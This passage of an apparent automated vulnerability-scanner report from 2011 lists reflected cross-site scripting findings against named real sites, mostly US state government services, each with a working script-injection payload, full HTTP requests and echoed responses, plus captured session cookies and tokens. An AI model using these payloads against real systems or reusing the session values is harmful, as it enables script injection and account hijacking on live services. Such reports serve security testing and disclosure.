The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bda"><script>alert(1)</script>1d3b780a45a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tennessee/default.cfm?e3bda"><script>alert(1)</script>1d3b780a45a=1 HTTP/1.1
Host: agency.governmentjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" x
...[SNIP]...
<form autocomplete="off" name="frmSort" action="http://agency.governmentjobs.com/tennessee/default.cfm?e3bda"><script>alert(1)</script>1d3b780a45a=1" method="post">
...[SNIP]...

3.3. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp [hdn_SessionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC001.asp

Issue detail

The value of the hdn_SessionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87835"><script>alert(1)</script>8e73b9878c8 was submitted in the hdn_SessionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PGM/ASP/SC001.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
Origin: https://assist.dhss.delaware.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000
Content-Length: 388

hdn_ApplicationNum=&hdn_LoopNum=&hdn_SessionId=87835"><script>alert(1)</script>8e73b9878c8&hdn_PageId=SC001&hdn_DrSeqNum=&hdn_BussFunc=2&hdn_Frompage=&hdn_Language=EN&hdn_Context=&hdn_SuspendPage=&hdn_Program=MA&hdnReEntrant=Yes&hdn_IsSubmitted=1&hdn_GoBackClick=1&hdn_ButtonHitStatus=&hdn_
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:12:26 GMT; path=/
Date: Sat, 30 Apr 2011 00:40:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 11586
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:40:00 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html LANG="EN">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTENT
...[SNIP]...
<TD width='70%' align='left' valign='top'>87835"><script>alert(1)</script>8e73b9878c8&nbsp;</TD>
...[SNIP]...

3.4. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp [hdn_Language parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The value of the hdn_Language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 974ab"><script>alert(1)</script>62305ace645 was submitted in the hdn_Language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /PGM/ASP/SC020.asp?hdn_Language=EN974ab"><script>alert(1)</script>62305ace645&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:48 GMT; path=/
Date: Sat, 30 Apr 2011 00:38:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10740
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:38:22 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...
<input TYPE="Hidden" ID="hdn_Language" NAME="hdn_Language" VALUE="EN974ab"><script>alert(1)</script>62305ace645">
...[SNIP]...

3.5. http://badge.dopiaza.org/flickr/badge.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://badge.dopiaza.org
Path:   /flickr/badge.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 102af<script>alert(1)</script>b0ad6541571 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flickr/badge.php?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal;callback=jsonp130412404/102af<script>alert(1)</script>b0ad65415719963 HTTP/1.1
Host: badge.dopiaza.org
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=0b45eb9ced5b28bbb124a002452a9432; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 2419

jsonp130412404/102af<script>alert(1)</script>b0ad65415719963({source: "Cache [1112]", badge: "<ul class=\"dopiaza-flickr-badge-content\"><li class=\"first\"><img src=\"http://farm6.static.flickr.com/5
...[SNIP]...

3.6. http://badge.dopiaza.org/flickr/badge.php [user parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://badge.dopiaza.org
Path:   /flickr/badge.php

Issue detail

The value of the user request parameter is copied into the HTML document as plain text between tags. The payload 4b142<script>alert(1)</script>131c1eb7f27 was submitted in the user parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flickr/badge.php?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal;callback=jsonp13041240499634b142<script>alert(1)</script>131c1eb7f27 HTTP/1.1
Host: badge.dopiaza.org
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:38 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=0ea5122a4b70b6e39028022faf85e52d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 2418

jsonp13041240499634b142<script>alert(1)</script>131c1eb7f27({source: "Cache [1114]", badge: "<ul class=\"dopiaza-flickr-badge-content\"><li class=\"first\"><img src=\"http://farm6.static.flickr.com/51
...[SNIP]...

3.7. http://data.gosquared.com/info [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.gosquared.com
Path:   /info

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload bb626<script>alert(1)</script>1ce2267e2f9 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info?a=GSN-237422-Wbb626<script>alert(1)</script>1ce2267e2f9&cs=UTF-8&cd=16&fl=10.2%20r154&je=1&la=en-us&sw=1920&sh=1200&dm=www.mo.gov&pa=%2F&pt=MO.gov%20%7C%20Official%20Website%20of%20the%20State%20of%20Missouri&pr=http%3A&pl=0&tl=5805&ri=0&ru=-&ui=1496610374&re=0&vi=1&pv=1&lv=0&un=PUBLIC_TRAFFIC HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:15:42 GMT
Expires: Tue, 05 Apr 2011 11:15:42
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 318

/* Error: line 36 in /var/www/shard/include/classes/GS_log.php
    [2] fopen(/var/log/gosquared/actions.log): failed to open stream: Permission denied */
/*** Error 402: We couldn't find any sites registered with account code or ID "GSN-237422-Wbb626<script>alert(1)</script>1ce2267e2f9"    Referring page: www.mo.gov/ ***/

3.8. http://data.ok.gov/api/rdfTerms.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/rdfTerms.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e754<script>alert(1)</script>62783531095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/rdfTerms.json3e754<script>alert(1)</script>62783531095?type=property HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:22:55 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/rdfTerms.json3e754<script>alert(1)</script>62783531095"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 137

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/rdfTerms.json3e754<script>alert(1)</script>62783531095\""
}

3.9. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8ba<script>alert(1)</script>8a84712b69d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:39 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views7d8ba<script>alert(1)</script>8a84712b69d/35sq-wrr4/snapshots/page\""
}

3.10. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 19f3f<script>alert(1)</script>661c8559ca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/35sq-wrr419f3f<script>alert(1)</script>661c8559ca5/snapshots/page\""
}

3.11. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6046c<script>alert(1)</script>543e6f3b246 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/35sq-wrr4/snapshots6046c<script>alert(1)</script>543e6f3b246/page\""
}

3.12. http://data.ok.gov/api/views/35sq-wrr4/snapshots/page [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/35sq-wrr4/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload 90e64<script>alert(1)</script>dd1f2b612b1 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/35sq-wrr4/snapshots/page?size=thumb90e64<script>alert(1)</script>dd1f2b612b1 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumb90e64<script>alert(1)</script>dd1f2b612b1
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumb90e64<script>alert(1)</script>dd1f2b612b1"
}

3.13. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 405e8<script>alert(1)</script>445270b6eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:40 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views405e8<script>alert(1)</script>445270b6eac/dz4w-xbzm/snapshots/page\""
}

3.14. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6230f<script>alert(1)</script>406c1f55e10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm6230f<script>alert(1)</script>406c1f55e10/snapshots/page\""
}

3.15. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72b93<script>alert(1)</script>091d192e286 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm/snapshots72b93<script>alert(1)</script>091d192e286/page\""
}

3.16. http://data.ok.gov/api/views/dz4w-xbzm/snapshots/page [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/dz4w-xbzm/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload d384b<script>alert(1)</script>90d3a2c8106 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/dz4w-xbzm/snapshots/page?size=thumbd384b<script>alert(1)</script>90d3a2c8106 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumbd384b<script>alert(1)</script>90d3a2c8106
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumbd384b<script>alert(1)</script>90d3a2c8106"
}

3.17. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86e9c<script>alert(1)</script>bfeb2fe5933 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
